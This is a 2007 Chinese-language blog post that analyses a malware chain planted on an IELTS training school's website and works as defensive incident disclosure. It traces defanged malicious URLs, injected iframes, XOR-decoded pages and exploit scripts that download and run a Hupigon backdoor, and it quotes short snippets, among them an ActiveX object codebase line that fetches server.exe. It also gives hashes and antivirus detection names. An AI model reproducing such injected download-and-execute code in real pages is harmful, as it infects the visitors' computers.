某雅思培训网站被挂 server.exe / Dropper.Win32.BlackHole.a / Backdoor.Win32.Hupigon.jmq
某雅思培训网站被挂 server.exe / Dropper.Win32.BlackHole.a/ Backdoor.Win32.Hupigon.jmq
endurer 原创
2007-09-12 第1版
2007-09-13 第2版 补充瑞星对 server.exe 的回复
网页包含代码:
/---
<iframe src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
---/
hxxp://www.be**a**utyco**nce*pt.cn/asp/index.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,其中包含代码:
/---
<script src=hxxp://c*s.cs*kic**k.cn/cs/c.js></script><frameset rows="444,0" cols="*">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index1.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index0.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index2.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/dns.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/ie.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/ie1.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/xp.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index.asp" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/ka.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/3800hk.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
---/
hxxp://c*s.cs*kic**k.cn/cs/c.js 的功能是检测 cookies变量 npconfig,若不存在则创建,并输出代码:
/---
<script language="javascript" src="hxxp://c*s.cs*kic**k.cn/cs/nc.js"></script>
---/
hxxp://c*s.cs*kic**k.cn/cs/nc.js 检测 MS06-014 漏洞,若存在则输出代码:
/---
<iframe width="0" height="0" src="hxxp://c*s.cs*kic**k.cn/cs/logo.htm"></iframe>
---/
否则输出代码:
/---
<iframe width="0" height="0" src="hxxp://c*s.cs*kic**k.cn/cs/file.htm"></iframe>
---/
hxxp://c*s.cs*kic**k.cn/cs/logo.htm 内容为:
/---
<link rel="stylesheet" href="GnYiVsAQ.CSS">
<Script language="Javascript" src="haha.js"></Script>
<IFRAME frameBorder=no height=1 src="2.htm" width=1></IFRAME>
---/
GnYiVsAQ.CSS 内容为:
/---
<STYLE type=text/css>
<!--
body {CURSOR: url('lo.jpg')}
--></STYLE>
---/
hxxp://c*s.cs*kic**k.cn/cs/lo.jpg 未能打开。
hxxp://c*s.cs*kic**k.cn/cs/haha.js 的功能是利用 ThunderServer.webThunder,调用IE 打开exec.htm,运行IE缓存中的 update[1].exe, 创建文件 C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Windows.hta。
hxxp://c*s.cs*kic**k.cn/cs/exec.htm 包含代码:
/---
<script src="sf.exe"></script>
---/
sf.exe 未能下载。
hxxp://c*s.cs*kic**k.cn/cs/2.htm 输出escape()加密的代码:
/---
<embed type="audio/x-pn-realaudio-plugin"
src="music.smi"
controls="controlpanel,statusbar" height=2
width=0 autostart=true>
---/
music.smi 为漏洞利用代码,瑞星报为:Hack.Exploit.Agent.dk
hxxp://c*s.cs*kic**k.cn/cs/file.htm 包含代码:
/---
<SCRIPT language="JScript.Encode" src=file.jpg></script>
---/
hxxp://c*s.cs*kic**k.cn/cs/file.jpg 的内容解密后为 下载 hxxp://bbs.h**n*p*j**.com/pic*/logo2.jpg,保存为~tmp.exe,通过 cmd.exe /c 来运行。
hxxp://bbs.h**n*p*j**.com/pic*/logo2.jpg 未能下载。
hxxp://www.be**a**utyco**nce*pt.cn/asp/index1.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,其中包含代码:
/---
<script language=javascript src="ta.js"></script>
---/
ta.js 下载 hxxp://www.be**a**utyco**nce*pt.cn/asp/server.exe,保存为 hk.exe,并运行。
瑞星报为 Trojan.DL.JS.Small.jd
文件说明符 : D:/test/server.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-11 23:35:50
修改时间 : 2007-9-11 23:35:56
访问时间 : 2007-9-11 23:37:9
大小 : 950784 字节 928.512 KB
MD5 : 0856b705b41ba7c140b1772fc589b531
HSA1: 3DFF4F937FE7020AEFB70295281283EC75F6BF63
|
Scanned file: server.exe - Infected |
| server.exe - infected by Backdoor.Win32.Hupigon.jmq |
| 主 题: | 病毒上报邮件分析结果-流水单号:20070911234829077058 | ||
| 发件人: | "" <send@rising.net.cn> <script language="JavaScript" type="text/javascript"> <!-- var aAddAdress = document.getElementById("aAddAdress"); aAddAdress.href = document.guideform.guidelinks.options[5].value; var aDeleteAdress = document.getElementById("aDeleteAdress"); aDeleteAdress.href = document.guideform.guidelinks.options[4].value; document.guideform.guidelinks.removeChild(document.guideform.guidelinks.options[5]); document.guideform.guidelinks.removeChild(document.guideform.guidelinks.options[4]); //--> </script> | 发送时间:2007.09.13 11:22 | |
尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:server.exe
病毒名: Dropper.Win32.BlackHole.a
您所上报的病毒文件将在19.40.32版本中处理解决。
hxxp://www.be**a**utyco**nce*pt.cn/asp/index0.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,从而
1。下载 server.exe,保存为 cike.exe,创建 cike.vbs 来运行。
2。下载 hxxp://bbs.h**n*p*j**.com/pic*/logo2.jpg,保存为 taskmgr.exe,创建 taskmgr.vbs 来运行。
hxxp://www.be**a**utyco**nce*pt.cn/asp/index2.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是检测 cookies 变量 Chg 是否存在,不存在则创建,并利用 APPLET 修改注册表 HKCU/Software/Microsoft/Windows/CurrentVersion/Internet Settings/Zones/3/1004,并打开网页 ActiveX1.htm
ActiveX1.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,其中包含代码:
/---
<script src=http://cs~cskick~cn/cs/c~js></script><!doctype html public "-//w3c//dtd html 4~0 transitional//en">
<html><head>
<meta http-equiv=content-type content="text/html; charset=gb2312">
<script language=javascript>
sofzl="<object id=\"sofzlcn\" width=0 height=0 type=\"application/x-oleobject\""
sofzl+="codebase=\"http://www~beautyconcept~cn/asp/server~exe#microsoft=1,1,1,1\">"
sofzl+="<param name=\"_microsoft\" value=\"2008\">"
sofzl+="</object>"
document~open();
document~clear();
document~writeln(sofzl);
document~close();
</script>
---/
hxxp://www.be**a**utyco**nce*pt.cn/asp/dns.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是禁止右键关联菜单和拖动选定,下载 server.exe,保存为 Cuteqq_Cn.exe并运行。
hxxp://www.be**a**utyco**nce*pt.cn/asp/ie.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是禁止右键关联菜单和拖动选定,下载 server.exe,保存为 Cuteqq_Cn.exe,创建 Cuteqq_CN.vbs 来运行。
hxxp://www.be**a**utyco**nce*pt.cn/asp/ie1.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是禁止右键关联菜单和拖动选定,下载 server.exe,保存为 sofzlcn.exe,创建 Cuteqq_CN.vbs 来运行。
hxxp://www.be**a**utyco**nce*pt.cn/asp/xp.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是下载 server.exe,保存为 sofzlcn.exe 并运行。
hxxp://www.be**a**utyco**nce*pt.cn/asp/index.asp 包含代码:
/---
<script type="text/javascript" src="index1.asp"></script>
RUN("hxxp://www.be**a**utyco**nce*pt.cn/asp/"
);</script>
---/
hxxp://www.be**a**utyco**nce*pt.cn/asp/index1.asp 未能打开。
hxxp://www.be**a**utyco**nce*pt.cn/asp/ka.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是 下载 server.exe,保存为 svchost.exe 并运行。
hxxp://www.be**a**utyco**nce*pt.cn/asp/3800hk.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出QQ溢出漏洞的代码。
某雅思培训网站被挂 server.exe / Dropper.Win32.BlackHole.a / Backdoor.Win32.Hupigon.jmq相关推荐
- 雅思培训心得(1)摸底测试听力与阅读
今天开始上雅思培训了,直至8月12日,期望能够让自己的英语水平提升到一个新的高度和水平,尤其是听力.写作和口语. 今天早上是2小时的摸底测试,测听力和阅读.之前没有认真看过雅思的题型,所以做的效果不是 ...
- 雅思培训心得(2)口语考试应对策略(8-8更新)
雅思培训口语专题笔记与心得 一.Notes: 1. 注意口语化.生活化,不要背书面化的经典句子,取其精义即可: 2. 雅思口语题目越来越人性化,一般不会有题目太专业以致看不懂,有生活化趋向: 3. ...
- 雅思口语有技巧,陈家桥雅思培训有妙招
雅思的培训学习在目前国内的教学条件中也有很多,不过综合考量这个国际的语言类考试,其灵活性的要求非常强,对于学员的基本功与语言的驾驭能力要求也很高.雅思口语培训课程对于教学的效果,就有很直接的影响.所以 ...
- 磁器口雅思培训-快速提高雅思听力的方法
是不是还在觉得你的雅思听力无可救药?同学们不要气馁,相信只要科学备考,付出就会有收获.今天小编就为同学们准备了一份雅思听力备考攻略,你的听力有救了! 掌握正确的背单词方法 简单说,任何花时间.精力折磨 ...
- 英文原著582本分享和新东方雅思培训视频资料(和学为贵雅思资料)
今天给大家奉献的是悉心整理的英文原著和雅思学习资料,希望能对大家的英文学习有所帮助,如果觉得有用,记得点击文末的"在看"和赞
- 大连雅思培训百家外语国际部雅思写作中词汇应用的技巧
雅思写作高分的取得并不是一件容易的事,大家需要掌握一定的写作技巧,词汇的应用就是最基础的.雅思写作中词汇应用的技巧 词汇语序不准确是导致大家不能拿到雅思写作高分的重要因素. 因为中文和英文的叙述方式的 ...
- 七天雅思口语涨分0.5,小龙坎雅思培训课教你如何做!
很多人对雅思口语考试评分标准的流利度部分理解都存在误区,容易望文生义,但我们一定要注意,雅思口语考试的流利度部分评分除了流利度还有逻辑词,而且是逻辑词越地道自然越好,而这就需要我们进行逻辑词升级,而不 ...
- 小龙坎雅思培训笔记,三步学习方法
如今最早的英语教学出现在胎教,很多人认为这有点夸张了,其实让孩子早点接触到英语是件好事,因为科学家也说过孩子学习英语最好的年龄是3到5岁,这也就说明越早接触英语,对孩子学习英语更有帮助,孩子也是在这个 ...
- 不出国,雅思也有大用。来看这篇IELTS雅思考试超详细扫盲贴
文 / 冷玥(微信公众号:王不留) 随着欧美国家陆续开放边境,出国留学的话题也开始热了起来. 我根据周围小伙伴们的经验分享,结合自身经历,整理了一份雅思考试扫盲帖,大约8000字,希望对大家能有所帮助 ...
最新文章
- CSDN”原力计划“在召唤:技术人请集结,用原创技术影响万千开发者
- 用FDISK进行硬盘分区
- 电脑安装python3.7说缺少-centos7:python3.7 缺少_ssl模块问题
- mysql查看已打开文件数_MySQL如何计算打开文件数_MySQL
- [Office 2010 易宝典]怎样直接将Office文档保存为PDF格式?
- Elasticsearch 集群平衡配置
- springboot问题Description Resource Path Location Type Java compiler level does not match the version o
- 『设计模式』Web程序开发最基本的编程模式--MVC编程模式
- 第 3 章 镜像 - 015 - 调试 Dockerfile
- JavaEE实战班第13天
- 数字图像处理--霍夫变换直线检测及原理理解
- vue 修改项目启动后的页面_vue项目打包后打开页面空白解决办法
- 甲方都爱的C4D设计,有了这组灵感,0基础也能get!
- php 正则匹配中文标点,JavaScript_js实现正则匹配中文标点符号的方法,本文实例讲述了js正则匹配中 - phpStudy...
- 五种基于RGB色彩空间统计的皮肤检测算法
- PHP文件系统-文件的读写操作
- 未来智能穿戴把计算机织进纤维里,未来智能穿戴 把计算机“织”进纤维里
- abaqus如何并行计算_Abaqus软件与并行计算的硬件配置
- Epub,Mobi,Azw3电子书格式的区别,有什么好用的IOS手机epub阅读器
- [BZOJ4134][JZOJ4401]ljw和lzr的hack比赛